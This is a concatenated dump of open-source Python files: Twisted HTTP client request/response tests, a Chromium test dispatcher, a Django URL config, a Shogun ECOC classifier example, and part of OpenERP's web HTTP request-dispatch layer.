If L{Request} is created with a C{bodyProducer} with a known length and
        the producer tries to produce more than that many bytes, the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping a L{WrongBodyLength} exception.
"""
def finisher(producer):
producer.finished.errback(ArbitraryException())
errors = self.flushLoggedErrors(ArbitraryException)
self.assertEqual(len(errors), 1)
return self._sendRequestBodyWithTooManyBytesTest(finisher)
def test_sendRequestBodyErrorWithConsumerError(self):
"""
Though there should be no way for the internal C{finishedConsuming}
L{Deferred} in L{Request._writeToContentLength} to fire a L{Failure}
after the C{finishedProducing} L{Deferred} has fired, in case this does
happen, the error should be logged with a message about how there's
probably a bug in L{Request}.
This is a whitebox test.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
finishedConsuming = producer.consumer._finished
producer.consumer.write('abc')
producer.finished.callback(None)
finishedConsuming.errback(ArbitraryException())
self.assertEqual(len(self.flushLoggedErrors(ArbitraryException)), 1)
def _sendRequestBodyFinishedEarlyThenTooManyBytes(self, finisher):
"""
Verify that if the body producer fires its Deferred and then keeps
writing to the consumer that the extra writes are ignored and the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping the most appropriate exception type.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
finisher(producer)
self.assertIdentical(self.transport.producer, None)
self.transport.clear()
self.assertRaises(ExcessWrite, producer.consumer.write, 'cd')
self.assertEqual(self.transport.value(), "")
return writeDeferred
def test_sendRequestBodyFinishedEarlyThenTooManyBytes(self):
"""
If the request body producer indicates it is done by firing the
L{Deferred} returned from its C{startProducing} method but then goes on
        to write too many bytes, the L{Deferred} returned by L{Request.writeTo}
fires with a L{Failure} wrapping L{WrongBodyLength}.
"""
def finisher(producer):
producer.finished.callback(None)
return self.assertFailure(
self._sendRequestBodyFinishedEarlyThenTooManyBytes(finisher),
WrongBodyLength)
def test_sendRequestBodyErroredEarlyThenTooManyBytes(self):
"""
If the request body producer indicates an error by firing the
L{Deferred} returned from its C{startProducing} method but then goes on
        to write too many bytes, the L{Deferred} returned by L{Request.writeTo}
fires with that L{Failure} and L{WrongBodyLength} is logged.
"""
def finisher(producer):
producer.finished.errback(ArbitraryException())
return self.assertFailure(
self._sendRequestBodyFinishedEarlyThenTooManyBytes(finisher),
ArbitraryException)
def test_sendChunkedRequestBodyFinishedThenWriteMore(self, _with=None):
"""
If the request body producer with an unknown length tries to write
after firing the L{Deferred} returned by its C{startProducing} method,
the C{write} call raises an exception and does not write anything to
the underlying transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.finished.callback(_with)
self.transport.clear()
self.assertRaises(ExcessWrite, producer.consumer.write, 'foo')
self.assertEqual(self.transport.value(), "")
return writeDeferred
def test_sendChunkedRequestBodyFinishedWithErrorThenWriteMore(self):
"""
If the request body producer with an unknown length tries to write
after firing the L{Deferred} returned by its C{startProducing} method
with a L{Failure}, the C{write} call raises an exception and does not
write anything to the underlying transport.
"""
d = self.test_sendChunkedRequestBodyFinishedThenWriteMore(
Failure(ArbitraryException()))
return self.assertFailure(d, ArbitraryException)
def test_sendRequestBodyWithError(self):
"""
If the L{Deferred} returned from the C{startProducing} method of the
L{IBodyProducer} passed to L{Request} fires with a L{Failure}, the
L{Deferred} returned from L{Request.writeTo} fails with that
L{Failure}.
"""
producer = StringProducer(5)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
# Sanity check - the producer should be registered with the underlying
# transport.
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
producer.consumer.write('ab')
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 5\r\n"
"Host: example.com\r\n"
"\r\n"
"ab")
self.assertFalse(self.transport.disconnecting)
producer.finished.errback(Failure(ArbitraryException()))
# Disconnection is handled by a higher level. Request should leave the
# transport alone in this case.
self.assertFalse(self.transport.disconnecting)
# Oh. Except it should unregister the producer that it registered.
self.assertIdentical(self.transport.producer, None)
return self.assertFailure(writeDeferred, ArbitraryException)
def test_hostHeaderRequired(self):
"""
L{Request.writeTo} raises L{BadHeaders} if there is not exactly one
I{Host} header and writes nothing to the given transport.
"""
request = Request('GET', '/', Headers({}), None)
self.assertRaises(BadHeaders, request.writeTo, self.transport)
self.assertEqual(self.transport.value(), '')
request = Request('GET', '/', Headers({'Host': ['example.com', 'example.org']}), None)
self.assertRaises(BadHeaders, request.writeTo, self.transport)
self.assertEqual(self.transport.value(), '')
def test_stopWriting(self):
"""
L{Request.stopWriting} calls its body producer's C{stopProducing}
method.
"""
producer = StringProducer(3)
request = Request('GET', '/', _boringHeaders, producer)
d = request.writeTo(self.transport)
self.assertFalse(producer.stopped)
request.stopWriting()
self.assertTrue(producer.stopped)
def test_brokenStopProducing(self):
"""
If the body producer's C{stopProducing} method raises an exception,
L{Request.stopWriting} logs it and does not re-raise it.
"""
producer = StringProducer(3)
def brokenStopProducing():
raise ArbitraryException("stopProducing is busted")
producer.stopProducing = brokenStopProducing
request = Request('GET', '/', _boringHeaders, producer)
d = request.writeTo(self.transport)
request.stopWriting()
self.assertEqual(
len(self.flushLoggedErrors(ArbitraryException)), 1)
class LengthEnforcingConsumerTests(TestCase):
"""
Tests for L{LengthEnforcingConsumer}.
"""
def setUp(self):
self.result = Deferred()
self.producer = StringProducer(10)
self.transport = StringTransport()
self.enforcer = LengthEnforcingConsumer(
self.producer, self.transport, self.result)
def test_write(self):
"""
L{LengthEnforcingConsumer.write} calls the wrapped consumer's C{write}
method with the bytes it is passed as long as there are fewer of them
than the C{length} attribute indicates remain to be received.
"""
self.enforcer.write('abc')
self.assertEqual(self.transport.value(), 'abc')
self.transport.clear()
self.enforcer.write('def')
self.assertEqual(self.transport.value(), 'def')
def test_finishedEarly(self):
"""
L{LengthEnforcingConsumer._noMoreWritesExpected} raises
L{WrongBodyLength} if it is called before the indicated number of bytes
have been written.
"""
self.enforcer.write('x' * 9)
self.assertRaises(WrongBodyLength, self.enforcer._noMoreWritesExpected)
def test_writeTooMany(self, _unregisterAfter=False):
"""
If it is called with a total number of bytes exceeding the indicated
limit passed to L{LengthEnforcingConsumer.__init__},
L{LengthEnforcingConsumer.write} fires the L{Deferred} with a
L{Failure} wrapping a L{WrongBodyLength} and also calls the
C{stopProducing} method of the producer.
"""
self.enforcer.write('x' * 10)
self.assertFalse(self.producer.stopped)
self.enforcer.write('x')
self.assertTrue(self.producer.stopped)
if _unregisterAfter:
self.enforcer._noMoreWritesExpected()
return self.assertFailure(self.result, WrongBodyLength)
def test_writeAfterNoMoreExpected(self):
"""
If L{LengthEnforcingConsumer.write} is called after
L{LengthEnforcingConsumer._noMoreWritesExpected}, it calls the
producer's C{stopProducing} method and raises L{ExcessWrite}.
"""
self.enforcer.write('x' * 10)
self.enforcer._noMoreWritesExpected()
self.assertFalse(self.producer.stopped)
self.assertRaises(ExcessWrite, self.enforcer.write, 'x')
self.assertTrue(self.producer.stopped)
def test_finishedLate(self):
"""
L{LengthEnforcingConsumer._noMoreWritesExpected} does nothing (in
particular, it does not raise any exception) if called after too many
bytes have been passed to C{write}.
"""
return self.test_writeTooMany(True)
def test_finished(self):
"""
If L{LengthEnforcingConsumer._noMoreWritesExpected} is called after
the correct number of bytes have been written it returns C{None}.
"""
self.enforcer.write('x' * 10)
self.assertIdentical(self.enforcer._noMoreWritesExpected(), None)
def test_stopProducingRaises(self):
"""
If L{LengthEnforcingConsumer.write} calls the producer's
C{stopProducing} because too many bytes were written and the
C{stopProducing} method raises an exception, the exception is logged
and the L{LengthEnforcingConsumer} still errbacks the finished
L{Deferred}.
"""
def brokenStopProducing():
StringProducer.stopProducing(self.producer)
raise ArbitraryException("stopProducing is busted")
self.producer.stopProducing = brokenStopProducing
def cbFinished(ignored):
self.assertEqual(
len(self.flushLoggedErrors(ArbitraryException)), 1)
d = self.test_writeTooMany()
d.addCallback(cbFinished)
return d
class RequestBodyConsumerTests(TestCase):
"""
Tests for L{ChunkedEncoder} which sits between an L{ITransport} and a
request/response body producer and chunked encodes everything written to
it.
"""
def test_interface(self):
"""
L{ChunkedEncoder} instances provide L{IConsumer}.
"""
self.assertTrue(
verifyObject(IConsumer, ChunkedEncoder(StringTransport())))
def test_write(self):
"""
L{ChunkedEncoder.write} writes to the transport the chunked encoded
form of the bytes passed to it.
"""
transport = StringTransport()
encoder = ChunkedEncoder(transport)
encoder.write('foo')
self.assertEqual(transport.value(), '3\r\nfoo\r\n')
transport.clear()
encoder.write('x' * 16)
self.assertEqual(transport.value(), '10\r\n' + 'x' * 16 + '\r\n')
def test_producerRegistration(self):
"""
L{ChunkedEncoder.registerProducer} registers the given streaming
producer with its transport and L{ChunkedEncoder.unregisterProducer}
writes a zero-length chunk to its transport and unregisters the
transport's producer.
"""
transport = StringTransport()
producer = object()
encoder = ChunkedEncoder(transport)
encoder.registerProducer(producer, True)
self.assertIdentical(transport.producer, producer)
self.assertTrue(transport.streaming)
encoder.unregisterProducer()
self.assertIdentical(transport.producer, None)
self.assertEqual(transport.value(), '0\r\n\r\n')
class TransportProxyProducerTests(TestCase):
"""
Tests for L{TransportProxyProducer} which proxies the L{IPushProducer}
interface of a transport.
"""
def test_interface(self):
"""
L{TransportProxyProducer} instances provide L{IPushProducer}.
"""
self.assertTrue(
verifyObject(IPushProducer, TransportProxyProducer(None)))
def test_stopProxyingUnreferencesProducer(self):
"""
L{TransportProxyProducer._stopProxying} drops the reference to the
wrapped L{IPushProducer} provider.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
self.assertIdentical(proxy._producer, transport)
proxy._stopProxying()
self.assertIdentical(proxy._producer, None)
def test_resumeProducing(self):
"""
L{TransportProxyProducer.resumeProducing} calls the wrapped
transport's C{resumeProducing} method unless told to stop proxying.
"""
transport = StringTransport()
transport.pauseProducing()
proxy = TransportProxyProducer(transport)
# The transport should still be paused.
self.assertEqual(transport.producerState, 'paused')
proxy.resumeProducing()
# The transport should now be resumed.
self.assertEqual(transport.producerState, 'producing')
transport.pauseProducing()
proxy._stopProxying()
# The proxy should no longer do anything to the transport.
proxy.resumeProducing()
self.assertEqual(transport.producerState, 'paused')
def test_pauseProducing(self):
"""
L{TransportProxyProducer.pauseProducing} calls the wrapped transport's
C{pauseProducing} method unless told to stop proxying.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
# The transport should still be producing.
self.assertEqual(transport.producerState, 'producing')
proxy.pauseProducing()
# The transport should now be paused.
self.assertEqual(transport.producerState, 'paused')
transport.resumeProducing()
proxy._stopProxying()
# The proxy should no longer do anything to the transport.
proxy.pauseProducing()
self.assertEqual(transport.producerState, 'producing')
def test_stopProducing(self):
"""
L{TransportProxyProducer.stopProducing} calls the wrapped transport's
C{stopProducing} method unless told to stop proxying.
"""
transport = StringTransport()
proxy = TransportProxyProducer(transport)
# The transport should still be producing.
self.assertEqual(transport.producerState, 'producing')
proxy.stopProducing()
# The transport should now be stopped.
self.assertEqual(transport.producerState, 'stopped')
transport = StringTransport()
proxy = TransportProxyProducer(transport)
proxy._stopProxying()
proxy.stopProducing()
# The transport should not have been stopped.
self.assertEqual(transport.producerState, 'producing')
class ResponseTests(TestCase):
"""
Tests for L{Response}.
"""
def test_makeConnection(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{makeConnection} method called with an L{IPushProducer} provider
hooked up to the response as an argument.
"""
producers = []
transport = StringTransport()
class SomeProtocol(Protocol):
def makeConnection(self, producer):
producers.append(producer)
consumer = SomeProtocol()
response = justTransportResponse(transport)
response.deliverBody(consumer)
[theProducer] = producers
theProducer.pauseProducing()
self.assertEqual(transport.producerState, 'paused')
theProducer.resumeProducing()
self.assertEqual(transport.producerState, 'producing')
def test_dataReceived(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{dataReceived} method called with bytes received as part of the
response body.
"""
bytes = []
class ListConsumer(Protocol):
def dataReceived(self, data):
bytes.append(data)
consumer = ListConsumer()
response = justTransportResponse(StringTransport())
response.deliverBody(consumer)
response._bodyDataReceived('foo')
self.assertEqual(bytes, ['foo'])
def test_connectionLost(self):
"""
The L{IProtocol} provider passed to L{Response.deliverBody} has its
C{connectionLost} method called with a L{Failure} wrapping
L{ResponseDone} when the response's C{_bodyDataFinished} method is
called.
"""
lost = []
class ListConsumer(Protocol):
def connectionLost(self, reason):
lost.append(reason)
consumer = ListConsumer()
response = justTransportResponse(StringTransport())
response.deliverBody(consumer)
response._bodyDataFinished()
lost[0].trap(ResponseDone)
self.assertEqual(len(lost), 1)
# The protocol reference should be dropped, too, to facilitate GC or
# whatever.
self.assertIdentical(response._bodyProtocol, None)
def test_bufferEarlyData(self):
"""
If data is delivered to the L{Response} before a protocol is registered
with C{deliverBody}, that data is buffered until the protocol is
registered and then is delivered.
"""
bytes = []
class ListConsumer(Protocol):
def dataReceived(self, data):
bytes.append(data)
protocol = ListConsumer()
response = justTransportResponse(StringTransport())
response._bodyDataReceived('foo')
response._bodyDataReceived('bar')
response.deliverBody(protocol)
response._bodyDataReceived('baz')
self.assertEqual(bytes, ['foo', 'bar', 'baz'])
# Make sure the implementation-detail-byte-buffer is cleared because
# not clearing it wastes memory.
self.assertIdentical(response._bodyBuffer, None)
def test_multipleStartProducingFails(self):
"""
L{Response.deliverBody} raises L{RuntimeError} if called more than
once.
"""
response = justTransportResponse(StringTransport())
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response.deliverBody, Protocol())
def test_startProducingAfterFinishedFails(self):
"""
L{Response.deliverBody} raises L{RuntimeError} if called after
L{Response._bodyDataFinished}.
"""
response = justTransportResponse(StringTransport())
response.deliverBody(Protocol())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response.deliverBody, Protocol())
def test_bodyDataReceivedAfterFinishedFails(self):
"""
L{Response._bodyDataReceived} raises L{RuntimeError} if called after
L{Response._bodyDataFinished} but before L{Response.deliverBody}.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response._bodyDataReceived, 'foo')
def test_bodyDataReceivedAfterDeliveryFails(self):
"""
L{Response._bodyDataReceived} raises L{RuntimeError} if called after
L{Response._bodyDataFinished} and after L{Response.deliverBody}.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response._bodyDataReceived, 'foo')
def test_bodyDataFinishedAfterFinishedFails(self):
"""
L{Response._bodyDataFinished} raises L{RuntimeError} if called more
than once.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
self.assertRaises(RuntimeError, response._bodyDataFinished)
def test_bodyDataFinishedAfterDeliveryFails(self):
"""
L{Response._bodyDataFinished} raises L{RuntimeError} if called after
the body has been delivered.
"""
response = justTransportResponse(StringTransport())
response._bodyDataFinished()
response.deliverBody(Protocol())
self.assertRaises(RuntimeError, response._bodyDataFinished)
def test_transportResumed(self):
"""
L{Response.deliverBody} resumes the HTTP connection's transport
before passing it to the transport's C{makeConnection} method.
"""
transportState = []
class ListConsumer(Protocol):
def makeConnection(self, transport):
transportState.append(transport.producerState)
transport = StringTransport()
transport.pauseProducing()
protocol = ListConsumer()
response = justTransportResponse(transport)
self.assertEqual(transport.producerState, 'paused')
response.deliverBody(protocol)
self.assertEqual(transportState, ['producing'])
def test_bodyDataFinishedBeforeStartProducing(self):
"""
If the entire body is delivered to the L{Response} before the
response's C{deliverBody} method is called, the protocol passed to
C{deliverBody} is immediately given the body data and then
disconnected.
"""
transport = StringTransport()
response = justTransportResponse(transport)
response._bodyDataReceived('foo')
response._bodyDataReceived('bar')
response._bodyDataFinished()
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.assertEqual(protocol.data, 'foobar')
protocol.closedReason.trap(ResponseDone)
def test_finishedWithErrorWhenConnected(self):
"""
The L{Failure} passed to L{Response._bodyDataFinished} when the response
is in the I{connected} state is passed to the C{connectionLost} method
of the L{IProtocol} provider passed to the L{Response}'s
C{deliverBody} method.
"""
transport = StringTransport()
response = justTransportResponse(transport)
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
# Sanity check - this test is for the connected state
self.assertEqual(response._state, 'CONNECTED')
response._bodyDataFinished(Failure(ArbitraryException()))
protocol.closedReason.trap(ArbitraryException)
def test_finishedWithErrorWhenInitial(self):
"""
The L{Failure} passed to L{Response._bodyDataFinished} when the response
is in the I{initial} state is passed to the C{connectionLost} method of
the L{IProtocol} provider passed to the L{Response}'s C{deliverBody}
method.
"""
transport = StringTransport()
response = justTransportResponse(transport)
# Sanity check - this test is for the initial state
self.assertEqual(response._state, 'INITIAL')
response._bodyDataFinished(Failure(ArbitraryException()))
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
protocol.closedReason.trap(ArbitraryException)
|
darktears/chromium-crosswalk | refs/heads/master | build/android/pylib/junit/test_dispatcher.py | 27 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from pylib import constants
from pylib.base import base_test_result
def RunTests(tests, runner_factory):
"""Runs a set of java tests on the host.
Return:
A tuple containing the results & the exit code.
"""
def run(t):
runner = runner_factory(None, None)
runner.SetUp()
results_list, return_code = runner.RunTest(t)
runner.TearDown()
return (results_list, return_code == 0)
test_run_results = base_test_result.TestRunResults()
exit_code = 0
for t in tests:
results_list, passed = run(t)
test_run_results.AddResults(results_list)
if not passed:
exit_code = constants.ERROR_EXIT_CODE
return (test_run_results, exit_code)
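The dispatch loop in `RunTests` above can be sketched standalone; the stub result collector and the `run_one` callback below are hypothetical stand-ins for the pylib runner machinery:

```python
class StubRunResults(object):
    """Hypothetical stand-in for base_test_result.TestRunResults."""
    def __init__(self):
        self.results = []

    def AddResults(self, results_list):
        self.results.extend(results_list)


def run_tests_sketch(tests, run_one, error_exit_code=1):
    # Mirrors RunTests: accumulate per-test results and latch a failing
    # exit code as soon as any single test fails.
    run_results, exit_code = StubRunResults(), 0
    for t in tests:
        results_list, passed = run_one(t)
        run_results.AddResults(results_list)
        if not passed:
            exit_code = error_exit_code
    return run_results, exit_code
```

Here `run_one` plays the role of the inner `run` closure (set up a runner, run the test, tear down); note how a single failure latches the exit code without stopping the loop.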
|
vipul-sharma20/oh-mainline | refs/heads/master | vendor/packages/Django/tests/regressiontests/middleware_exceptions/urls.py | 150 | # coding: utf-8
from __future__ import absolute_import
from django.conf.urls import patterns
from . import views
urlpatterns = patterns('',
(r'^middleware_exceptions/view/$', views.normal_view),
(r'^middleware_exceptions/not_found/$', views.not_found),
(r'^middleware_exceptions/error/$', views.server_error),
(r'^middleware_exceptions/null_view/$', views.null_view),
(r'^middleware_exceptions/permission_denied/$', views.permission_denied),
(r'^middleware_exceptions/template_response/$', views.template_response),
(r'^middleware_exceptions/template_response_error/$', views.template_response_error),
)
|
JingheZ/shogun | refs/heads/master | examples/undocumented/python_modular/classifier_multiclass_ecoc_discriminant.py | 19 | #!/usr/bin/env python
from tools.multiclass_shared import prepare_data
[traindat, label_traindat, testdat, label_testdat] = prepare_data(False)
parameter_list = [[traindat,testdat,label_traindat,label_testdat,2.1,1,1e-5],[traindat,testdat,label_traindat,label_testdat,2.2,1,1e-5]]
def classifier_multiclass_ecoc_discriminant (fm_train_real=traindat,fm_test_real=testdat,label_train_multiclass=label_traindat,label_test_multiclass=label_testdat,lawidth=2.1,C=1,epsilon=1e-5):
from modshogun import RealFeatures, MulticlassLabels
from modshogun import LibLinear, L2R_L2LOSS_SVC, LinearMulticlassMachine
from modshogun import ECOCStrategy, ECOCDiscriminantEncoder, ECOCHDDecoder
feats_train = RealFeatures(fm_train_real)
feats_test = RealFeatures(fm_test_real)
labels = MulticlassLabels(label_train_multiclass)
classifier = LibLinear(L2R_L2LOSS_SVC)
classifier.set_epsilon(epsilon)
classifier.set_bias_enabled(True)
encoder = ECOCDiscriminantEncoder()
encoder.set_features(feats_train)
encoder.set_labels(labels)
encoder.set_sffs_iterations(50)
strategy = ECOCStrategy(encoder, ECOCHDDecoder())
classifier = LinearMulticlassMachine(strategy, feats_train, classifier, labels)
classifier.train()
label_pred = classifier.apply(feats_test)
out = label_pred.get_labels()
if label_test_multiclass is not None:
from modshogun import MulticlassAccuracy
labels_test = MulticlassLabels(label_test_multiclass)
evaluator = MulticlassAccuracy()
acc = evaluator.evaluate(label_pred, labels_test)
print('Accuracy = %.4f' % acc)
return out
if __name__=='__main__':
print('MulticlassMachine')
classifier_multiclass_ecoc_discriminant(*parameter_list[0])
|
gqwest-erp/server | refs/heads/master | openerp/addons/web/http.py | 57 | # -*- coding: utf-8 -*-
#----------------------------------------------------------
# OpenERP Web HTTP layer
#----------------------------------------------------------
import ast
import cgi
import contextlib
import functools
import getpass
import logging
import mimetypes
import os
import pprint
import random
import sys
import tempfile
import threading
import time
import traceback
import urlparse
import uuid
import xmlrpclib
import errno
import babel.core
import simplejson
import werkzeug.contrib.sessions
import werkzeug.datastructures
import werkzeug.exceptions
import werkzeug.utils
import werkzeug.wrappers
import werkzeug.wsgi
import openerp
import session
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# RequestHandler
#----------------------------------------------------------
class WebRequest(object):
""" Parent class for all OpenERP Web request types, mostly deals with
initialization and setup of the request object (the dispatching itself has
to be handled by the subclasses)
:param request: a wrapped werkzeug Request object
:type request: :class:`werkzeug.wrappers.BaseRequest`
.. attribute:: httprequest
the original :class:`werkzeug.wrappers.Request` object provided to the
request
.. attribute:: httpsession
a :class:`~collections.Mapping` holding the HTTP session data for the
current http session
.. attribute:: params
:class:`~collections.Mapping` of request parameters, not generally
useful as they're provided directly to the handler method as keyword
arguments
.. attribute:: session_id
opaque identifier for the :class:`session.OpenERPSession` instance of
the current request
.. attribute:: session
:class:`~session.OpenERPSession` instance for the current request
.. attribute:: context
:class:`~collections.Mapping` of context values for the current request
.. attribute:: debug
``bool``, indicates whether the debug mode is active on the client
"""
def __init__(self, request):
self.httprequest = request
self.httpresponse = None
self.httpsession = request.session
def init(self, params):
self.params = dict(params)
# OpenERP session setup
self.session_id = self.params.pop("session_id", None) or uuid.uuid4().hex
self.session = self.httpsession.get(self.session_id)
if not self.session:
self.session = session.OpenERPSession()
self.httpsession[self.session_id] = self.session
# set db/uid trackers - they're cleaned up at the WSGI
# dispatching phase in openerp.service.wsgi_server.application
if self.session._db:
threading.current_thread().dbname = self.session._db
if self.session._uid:
threading.current_thread().uid = self.session._uid
self.context = self.params.pop('context', {})
self.debug = self.params.pop('debug', False) is not False
# Determine self.lang
lang = self.params.get('lang', None)
if lang is None:
lang = self.context.get('lang')
if lang is None:
lang = self.httprequest.cookies.get('lang')
if lang is None:
lang = self.httprequest.accept_languages.best
if not lang:
lang = 'en_US'
        # transform a 2-letter lang code like 'en' into a 5-letter one like 'en_US'
lang = babel.core.LOCALE_ALIASES.get(lang, lang)
        # we use _ as separator where RFC2616 uses '-'
self.lang = lang.replace('-', '_')
def reject_nonliteral(dct):
if '__ref' in dct:
raise ValueError(
"Non literal contexts can not be sent to the server anymore (%r)" % (dct,))
return dct
class JsonRequest(WebRequest):
""" JSON-RPC2 over HTTP.
    Successful request::
--> {"jsonrpc": "2.0",
"method": "call",
"params": {"session_id": "SID",
"context": {},
"arg1": "val1" },
"id": null}
<-- {"jsonrpc": "2.0",
"result": { "res1": "val1" },
"id": null}
    Request producing an error::
--> {"jsonrpc": "2.0",
"method": "call",
"params": {"session_id": "SID",
"context": {},
"arg1": "val1" },
"id": null}
<-- {"jsonrpc": "2.0",
"error": {"code": 1,
"message": "End user error message.",
"data": {"code": "codestring",
"debug": "traceback" } },
"id": null}
"""
def dispatch(self, method):
""" Calls the method asked for by the JSON-RPC2 or JSONP request
:param method: the method which received the request
        :returns: a UTF-8 encoded JSON-RPC2 or JSONP reply
"""
args = self.httprequest.args
jsonp = args.get('jsonp')
requestf = None
request = None
request_id = args.get('id')
if jsonp and self.httprequest.method == 'POST':
# jsonp 2 steps step1 POST: save call
self.init(args)
self.session.jsonp_requests[request_id] = self.httprequest.form['r']
headers=[('Content-Type', 'text/plain; charset=utf-8')]
r = werkzeug.wrappers.Response(request_id, headers=headers)
return r
elif jsonp and args.get('r'):
# jsonp method GET
request = args.get('r')
elif jsonp and request_id:
# jsonp 2 steps step2 GET: run and return result
self.init(args)
request = self.session.jsonp_requests.pop(request_id, "")
else:
# regular jsonrpc2
requestf = self.httprequest.stream
response = {"jsonrpc": "2.0" }
error = None
try:
# Read POST content or POST Form Data named "request"
if requestf:
self.jsonrequest = simplejson.load(requestf, object_hook=reject_nonliteral)
else:
self.jsonrequest = simplejson.loads(request, object_hook=reject_nonliteral)
self.init(self.jsonrequest.get("params", {}))
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug("--> %s.%s\n%s", method.im_class.__name__, method.__name__, pprint.pformat(self.jsonrequest))
response['id'] = self.jsonrequest.get('id')
response["result"] = method(self, **self.params)
except session.AuthenticationError:
error = {
'code': 100,
'message': "OpenERP Session Invalid",
'data': {
'type': 'session_invalid',
'debug': traceback.format_exc()
}
}
except xmlrpclib.Fault, e:
error = {
'code': 200,
'message': "OpenERP Server Error",
'data': {
'type': 'server_exception',
'fault_code': e.faultCode,
'debug': "Client %s\nServer %s" % (
"".join(traceback.format_exception("", None, sys.exc_traceback)), e.faultString)
}
}
except Exception:
logging.getLogger(__name__ + '.JSONRequest.dispatch').exception\
                ("An error occurred while handling a JSON request")
error = {
'code': 300,
'message': "OpenERP WebClient Error",
'data': {
'type': 'client_exception',
'debug': "Client %s" % traceback.format_exc()
}
}
if error:
response["error"] = error
if _logger.isEnabledFor(logging.DEBUG):
_logger.debug("<--\n%s", pprint.pformat(response))
if jsonp:
            # If we use jsonp, that means we were called from another host.
            # Some browsers (IE and Safari) do not allow third-party cookies,
            # so we need to manage http sessions manually.
response['httpsessionid'] = self.httpsession.sid
mime = 'application/javascript'
body = "%s(%s);" % (jsonp, simplejson.dumps(response),)
else:
mime = 'application/json'
body = simplejson.dumps(response)
r = werkzeug.wrappers.Response(body, headers=[('Content-Type', mime), ('Content-Length', len(body))])
return r
def jsonrequest(f):
""" Decorator marking the decorated method as being a handler for a
JSON-RPC request (the exact request path is specified via the
    ``$(Controller._cp_path)/$methodname`` combination).
If the method is called, it will be provided with a :class:`JsonRequest`
instance and all ``params`` sent during the JSON-RPC request, apart from
the ``session_id``, ``context`` and ``debug`` keys (which are stripped out
beforehand)
"""
f.exposed = 'json'
return f
class HttpRequest(WebRequest):
""" Regular GET/POST request
"""
def dispatch(self, method):
params = dict(self.httprequest.args)
params.update(self.httprequest.form)
params.update(self.httprequest.files)
self.init(params)
akw = {}
for key, value in self.httprequest.args.iteritems():
if isinstance(value, basestring) and len(value) < 1024:
akw[key] = value
else:
akw[key] = type(value)
_logger.debug("%s --> %s.%s %r", self.httprequest.method, method.im_class.__name__, method.__name__, akw)
try:
r = method(self, **self.params)
except xmlrpclib.Fault, e:
r = werkzeug.exceptions.InternalServerError(cgi.escape(simplejson.dumps({
'code': 200,
'message': "OpenERP Server Error",
'data': {
'type': 'server_exception',
'fault_code': e.faultCode,
'debug': "Server %s\nClient %s" % (
e.faultString, traceback.format_exc())
}
})))
except Exception:
logging.getLogger(__name__ + '.HttpRequest.dispatch').exception(
                "An error occurred while handling an HTTP request")
r = werkzeug.exceptions.InternalServerError(cgi.escape(simplejson.dumps({
'code': 300,
'message': "OpenERP WebClient Error",
'data': {
'type': 'client_exception',
'debug': "Client %s" % traceback.format_exc()
}
})))
if self.debug or 1:
if isinstance(r, (werkzeug.wrappers.BaseResponse, werkzeug.exceptions.HTTPException)):
_logger.debug('<-- %s', r)
else:
_logger.debug("<-- size: %s", len(r))
return r
def make_response(self, data, headers=None, cookies=None):
""" Helper for non-HTML responses, or HTML responses with custom
response headers or cookies.
While handlers can just return the HTML markup of a page they want to
send as a string if non-HTML data is returned they need to create a
complete response object, or the returned data will not be correctly
interpreted by the clients.
:param basestring data: response body
:param headers: HTTP headers to set on the response
:type headers: ``[(name, value)]``
:param collections.Mapping cookies: cookies to set on the client
"""
response = werkzeug.wrappers.Response(data, headers=headers)
if cookies:
for k, v in cookies.iteritems():
response.set_cookie(k, v)
return response
def not_found(self, description=None):
""" Helper for 404 response, return its result from the method
"""
return werkzeug.exceptions.NotFound(description)
def httprequest(f):
""" Decorator marking the decorated method as being a handler for a
normal HTTP request (the exact request path is specified via the
    ``$(Controller._cp_path)/$methodname`` combination).
If the method is called, it will be provided with a :class:`HttpRequest`
instance and all ``params`` sent during the request (``GET`` and ``POST``
merged in the same dictionary), apart from the ``session_id``, ``context``
and ``debug`` keys (which are stripped out beforehand)
"""
f.exposed = 'http'
return f
#----------------------------------------------------------
# Controller registration with a metaclass
#----------------------------------------------------------
addons_module = {}
addons_manifest = {}
controllers_class = []
controllers_class_path = {}
controllers_object = {}
controllers_object_path = {}
controllers_path = {}
class ControllerType(type):
def __init__(cls, name, bases, attrs):
super(ControllerType, cls).__init__(name, bases, attrs)
name_class = ("%s.%s" % (cls.__module__, cls.__name__), cls)
controllers_class.append(name_class)
path = attrs.get('_cp_path')
if path not in controllers_class_path:
controllers_class_path[path] = name_class
class Controller(object):
__metaclass__ = ControllerType
def __new__(cls, *args, **kwargs):
subclasses = [c for c in cls.__subclasses__() if c._cp_path == cls._cp_path]
if subclasses:
name = "%s (extended by %s)" % (cls.__name__, ', '.join(sub.__name__ for sub in subclasses))
cls = type(name, tuple(reversed(subclasses)), {})
return object.__new__(cls)
#----------------------------------------------------------
# Session context manager
#----------------------------------------------------------
